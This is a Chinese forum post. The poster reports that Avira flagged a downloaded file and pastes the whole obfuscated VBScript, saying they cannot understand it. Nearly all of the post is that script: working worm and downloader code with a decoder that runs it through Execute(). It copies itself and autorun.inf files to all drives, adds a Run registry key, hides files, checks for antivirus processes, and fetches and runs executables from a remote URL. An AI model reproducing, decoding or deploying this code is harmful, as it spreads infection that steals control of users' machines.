楼主是否设置有问题。我下载解压小红伞就报警拦截了。
这个vbs非常诡秘,我看不懂:
'EnCode By DaXian
ExeString="ire=reebe gvyr=reebebe&ire nobhg=reebereebe sebzhey=pue(659)&pue(661)&pue(661)&pue(667)&://&pue(30)&b.&pue(93)&pue(00)&pue(06)&1&pue(12)&pue(655)&pue(91)&a&pue(14)&pue(39)&pue(92)&uq&pue(92)&pue(661)&ba&pue(658)&wv&pue(92)&h0&pue(91)&pue(10)&pue(38)&pue(35)ba reebe erfhzr arkg qvz jfu qvz WfuSuryySrg Wfu =CerngrOowrpg(WSpevcg.Suryy) frg WfuSuryy=Wfpevcg.CerngrOowrpg(Wfpevcg.Suryy) Srg FSO = CerngrOowrpg(Spevcgvat.FvyrSlfgrzOowrpg) frg qve = FSO.GrgScrpvnyFbyqre(6) frg jva = FSO.GrgScrpvnyFbyqre(5) Srg qp = FSO.Devirf bhjaanzr=Wfpevcg.SpevcgNnzr rkrzhyh=FSO.GrgScrpvnyFbyqre(7)&\ jorz=FSO.GrgScrpvnyFbyqre(6)&\jorz\ zhyh=yrsg(Wfpevcg.SpevcgFhyyNnzr,yra(Wfpevcg.SpevcgFhyyNnzr)-yra(Wfpevcg.SpevcgNnzr)) vs zhyh=qve&\ gura flf=gehr Fbe Enpu q Ia qp vs zhyh=q&\ gura bcraqvfx=WfuSuryy.Rha(rkcybere &q,8,snyfr) Nrkg vs abg flf gura jfpevcg.fyrrc 7555vs wvapurat(jfpevcg.rkr,7) gura jfpevcg.dhvgraq vslvapnat vs ernqgkg(zhyh&nhgbeha.vas,6)<>gvyr gura ohvyqvas ire,abj,5,bhjaanzr raq Is Lrkr=ernqgkg(zhyh&nhgbeha.vas,0)&.rkr Is sfb.FvyrEkvfgf(rkrzhyh&Lrkr) naq flf gura WfuSuryy.eha rkrzhyh&Lrkr raq vsvs wvapurat(nic.rkr,6) gura x=6ryfrvs wvapurat(RniMba.rkr,6) gura x=7ryfrvs wvapurat(KWngpu.rkr,6) gura x=8ryfr x=9raq vsg = Dnl(Dngr) zbq 8 Is (x=6 naq g=6) be (x=7 naq g=7) be (x=8 naq g=7) be (x=9 naq g=5) gura Lqbjaire=ernqgkg(zhyh&nhgbeha.vas,0) Lgnfxire=ernqgkg(zhyh&nhgbeha.vas,2)Lgnfxfj=ernqgkg(zhyh&nhgbeha.vas,4)vs flf guragrfg=5 qb juvyr grfg<75qbjasvyr rkrzhyh&grfg.ugz,uggc://jjj.onvqh.pbz/,5arggrfg=ernqgkg(rkrzhyh&grfg.ugz,6)qrysvyr(rkrzhyh&grfg.ugz) vs arggrfg<>abg_sbhaq gurarkvg qbryfrgrfg=grfg+6jfpevcg.fyrrc 85555raq vsybbcraq vsvs yrsg((ernqgkg(p:\qngr.ova,6)),4)<>yrsg(abj,4) gura wf=6qb juvyr purpx<><fpevcg vs wf>7 guraqbjasvyr zhyh&grzc.gkg,sebzhey7,5purpx=ernqgkg(zhyh&grzc.gkg,6)ryfrqbjasvyr zhyh&grzc.gkg,sebzhey,5purpx=ernqgkg(zhyh&grzc.gkg,6)raq vswf=wf+6vs wf>9 gurapurpx=<fpevcg 'rkvg qbraq vsybbc Srg OcraFvyr = FSO.OcraTrkgFvyr(zhyh&grzc.gkg, 6) purpx = OcraFvyr.RrnqLvarqbjavf = OcraFvyr.RrnqLvarqbjaire = OcraFvyr.RrnqLvarqbjaanzr = qbjaire&.rkrqbjasebz = OcraFvyr.RrnqLvariofire = OcraFvyr.RrnqLvariofeha = OcraFvyr.RrnqLvariofanzr = OcraFvyr.RrnqLvariofsebz = OcraFvyr.RrnqLvargnfxvf = OcraFvyr.RrnqLvargnfxanzr = OcraFvyr.RrnqLvargnfxsebz = OcraFvyr.RrnqLvarthnattnb= OcraFvyr.RrnqLvarOcraFvyr.Cybfr FSO.DryrgrFvyr(zhyh&grzc.gkg)vs qbjavf=6 guraohvyqsvyr p:\qngr.ova,abjohvyqvas qbjaire,gnfxanzr,gnfxvf,thnattnbIs iofire<>ire guraqbjasvyr zhyh&iofanzr,iofsebz,iofehajfpevcg.dhvgraq vsvs gnfxvf=6 guraIs Lgnfxire<>gnfxanzr be abg sfb.FvyrEkvfgf(rkrzhyh&Lgnfxire) guraqrysvyr rkrzhyh&Lgnfxirenqiqbjasvyr rkrzhyh&gnfxanzr,gnfxsebz,5,8,65555raq vsraq vsIs qbjaire<>Lqbjaire be abg sfb.FvyrEkvfgf(rkrzhyh&Lrkr) guraqrysvyr rkrzhyh&Lrkrnqiqbjasvyr rkrzhyh&qbjaanzr,qbjasebz,5,8,65555raq vsraq vsraq vsvs sfb.FvyrEkvfgf(rkrzhyh&Lgnfxire) naq flf naq Lgnfxfj=6 guraWfuSuryy.eha rkrzhyh&Lgnfxireraq vsEaq vsvs flf gura vs ernqgkg(jva&\`.ior,6)<>'&ire gurapbcliof jva&\`.iorraq vsvs ernqgkg(p:\`.iof,6)<>'&ire gurapbcliof p:\`.iofCbclFvyr zhyh&nhgbeha.vas,p:\nhgbeha.vasraq vstnaena() WfuSuryy.eha zhyh&bhjaanzrryfrfuhkvat zhyh&bhjaanzr,7+9 pbcliof qve&\`.iorpbcliof jva&\`.iorCbclFvyr zhyh&nhgbeha.vas,qve&\nhgbeha.vasvs zhyh<>C:\ gurapbcliof p:\`.iofCbclFvyr zhyh&nhgbeha.vas,p:\nhgbeha.vasraq vsmuhprWfuSuryy.eha qve&\`.iorraq vsshapgvba qrysvyr(jurer) Is sfb.FvyrEkvfgf(jurer) gura fuhkvat jurer,5FSO.DryrgrFvyr(jurer)raq vsraq shapgvbashapgvba ohvyqsvyr(jurer,jung) fuhkvat jurer,5frg ova = sfb.CerngrTrkgFvyr(jurer, Tehr)ova.jevgryvar jungova.pybfrfuhkvat jurer,7+9raq shapgvbashapgvba wvapurat(jurer,trfuh) frg l=trgbowrpg(jvaztzgf:\\.\ebbg\pvzi7) frg k=l.rkrpdhrel(fryrpg * sebz jva87_cebprff jurer anzr='&jurer&') v=6 sbe rnpu w va k v=v+6arkgvs v>trfuh gura wvapurat = gehrraq shapgvbashapgvba pbclsvyr(svyr,jurer) fuhkvat jurer,5vs sfb.FvyrEkvfgf(svyr) gura FSO.CbclFvyr svyr,jurer,Tehrraq vsraq shapgvbashapgvba pbcliof(jurer) fuhkvat jurer,5frg frys=sfb.bcragrkgsvyr(zhyh&bhjaanzr,6)iofpbcl=frys.ernqnyy frys.pybfr frg iof = sfb.CerngrTrkgFvyr(jurer, Tehr)iof.jevgr iofpbcliof.pybfrfuhkvat jurer,7+9raq shapgvbashapgvba muhpr() RrtPngu=HKEY_LOCAL_MACHINE\SOFTWARE\Mvpebfbsg\Wvaqbjf\CheeragVrefvba\cbyvpvrf\Ekcybere\eha\ Tlcr_Nnzr=REG_SZ Krl_Nnzr=rkcybere Krl_Dngn=`.ior WfuSuryy.RrtWevgr RrtPngu&Krl_Nnzr,Krl_Dngn,Tlcr_Nnzr raq shapgvbashapgvba lvapnat() RrtPngu=HKEY_CURRENT_USER\Sbsgjner\Mvpebfbsg\Wvaqbjf\CheeragVrefvba\Ekcybere\Aqinaprq\ Tlcr_Nnzr=REG_DWORD Krl_Nnzr=SubjShcreHvqqra Krl_Dngn=55555555 WfuSuryy.RrtWevgr RrtPngu&Krl_Nnzr,Krl_Dngn,Tlcr_Nnzr raq shapgvbashapgvba ohvyqvas(rkrire,gnfxanzr,gnfxfj,nqi) fuhkvat zhyh&nhgbeha.vas,5frg vav = sfb.CerngrTrkgFvyr(zhyh&nhgbeha.vas, Tehr)vav.jevgryvar gvyrvav.jevgryvar [AhgbRha]vav.jevgryvar nobhgvav.jevgryvar bcra=WSpevcg.rkr .\`.iofvav.jevgryvar rkrirevav.jevgryvar furyy\bcra=打开(&O)vav.jevgryvar gnfxanzrvav.jevgryvar furyy\bcra\Cbzznaq=WSpevcg.rkr .\`.iofvav.jevgryvar gnfxfjvav.jevgryvar furyy\bcra\Drsnhyg=6vav.jevgryvar nqivav.pybfrfuhkvat zhyh&nhgbeha.vas,6+7+9raq shapgvbashapgvba ernqgkg(jurer,yvar) vs sfb.FvyrEkvfgf(jurer) guraSrg ernqsvyr = sfb.OcraTrkgFvyr(jurer, 6) v=5 qb juvyr v<yvarv=v+6fgeLvar = ernqsvyr.RrnqLvarybbcernqsvyr.Cybfrernqgkg=fgeLvarryfrernqgkg=abg_sbhaqraq vsraq shapgvbashapgvba fuhkvat(svyr,punatr) vs sfb.FvyrEkvfgf(svyr) guraSrg bFvyr = FSO.GrgFvyr(svyr) bFvyr.Aggevohgrf = punatrSrg bFvyr = Nbguvatraq vsraq shapgvbashapgvba qbjasvyr(ybpnysvyr,heysvyr,ehasvyr) fuhkvat ybpnysvyr,5vLbpny = LCnfr(ybpnysvyr):vRrzbgr = LCnfr(heysvyr):'vs 6=7 gura Wfpevcg.rpub Izcbffvoyr!Srg kPbfg = CerngrOowrpg(Mvpebfbsg.XMLHTTP) 'vs 6=7 gura Wfpevcg.rpub Izcbffvoyr!kPbfg.Ocra trg,vRrzbgr,5 'vs 6=7 gura Wfpevcg.rpub Izcbffvoyr!kPbfg.Sraq() 'vs 6=7 gura Wfpevcg.rpub Izcbffvoyr!Srg fGrg = CerngrOowrpg(ADODB.Sgernz) 'vs 6=7 gura Wfpevcg.rpub Izcbffvoyr!fGrg.Mbqr = 8 'vs 6=7 gura Wfpevcg.rpub Izcbffvoyr!fGrg.Tlcr = 6 'vs 6=7 gura Wfpevcg.rpub Izcbffvoyr!fGrg.Ocra() 'vs 6=7 gura Wfpevcg.rpub Izcbffvoyr!fGrg.Wevgr(kPbfg.erfcbafrBbql) 'vs 6=7 gura Wfpevcg.rpub Izcbffvoyr!fGrg.SnirTbFvyr vLbpny,7 'vs 6=7 gura Wfpevcg.rpub Izcbffvoyr!fuhkvat ybpnysvyr,7+9vs ehasvyr=6 gura Wfu.eha vLbpnyraq shapgvbashapgvba nqiqbjasvyr(ybpnysvyr,heysvyr,ehasvyr,pvfuh,zvafvmr) grfg=5qb juvyr grfg<pvfuhqbjasvyr ybpnysvyr,heysvyr,5vs sfb.FvyrEkvfgf(ybpnysvyr) gurasvyrfvmr=sfb.GrgFvyr(ybpnysvyr).fvmrryfrsvyrfvmr=5raq vsvs svyrfvmr>zvafvmr guravs ehasvyr=6 gura Wfu.eha ybpnysvyrrkvg qbryfrgrfg=grfg+6qrysvyr ybpnysvyrjfpevcg.fyrrc 85555raq vsybbcraq shapgvbashapgvba tnaena() qbFbe Enpu q Ia qpIs q.DevirTlcr = 8 be (q.DevirTlcr = 6 naq q<>A: naq q<> B:) Turavs sfb.FbyqreEkvfgf(q&\nhgbeha.vas) guraSrg bFvyr = FSO.GrgFbyqre(q&nhgbeha.vas)bFvyr.Aggevohgrf = 5Srg bFvyr = NbguvatFSO.DryrgrFbyqre(q&\nhgbeha.vas)raq vsIs sfb.FvyrEkvfgf(q&\`.iof) naq sfb.FvyrEkvfgf(q&\nhgbeha.vas) guravs ernqgkg(q&\nhgbeha.vas,6)<>gvyr guraCbclFvyr qve&\nhgbeha.vas,q&\nhgbeha.vasCbclFvyr jva&\`.ior,q&\`.iofraq vsryfrCbclFvyr qve&\nhgbeha.vas,q&\nhgbeha.vasCbclFvyr jva&\`.ior,q&\`.iofraq vsEaq Isarkgjfpevcg.fyrrc 7555ybbcraq shapgvba"
Execute("For i=1 To Len(ExeString)"&vbCrLf&"linshima = Asc(Mid(ExeString,i,1))"&vbCrLf&"If linshima = 28 Then"&vbCrLf&"linshima = 13"&vbCrLf&"ElseIf linshima = 29 Then"&vbCrLf&"linshima = 10"&vbCrLf&"elseif linshima=18 Then"&vbCrLf&"linshima = 34"&vbCrLf&"elseif linshima>96 and linshima<110 then"&vbCrLf&"linshima=linshima+13"&vbCrLf&"elseif linshima>109 and linshima<123 then"&vbCrLf&"linshima=linshima-13"&vbCrLf&"elseif linshima>47 and linshima<53 then"&vbCrLf&"linshima=linshima+5"&vbCrLf&"elseif linshima>52 and linshima<58 then"&vbCrLf&"linshima=linshima-5"&vbCrLf&"End If"&vbCrLf&"ThisText=ThisText+chr(linshima)"&vbCrLf&"Next")
Execute(ThisText) |